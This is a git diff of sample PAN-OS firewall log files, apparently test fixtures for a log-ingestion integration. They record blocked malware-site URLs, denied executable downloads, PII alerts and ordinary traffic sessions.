04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log index 70d2804a712..2857446f693 100644 --- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log +++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-traffic.log @@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 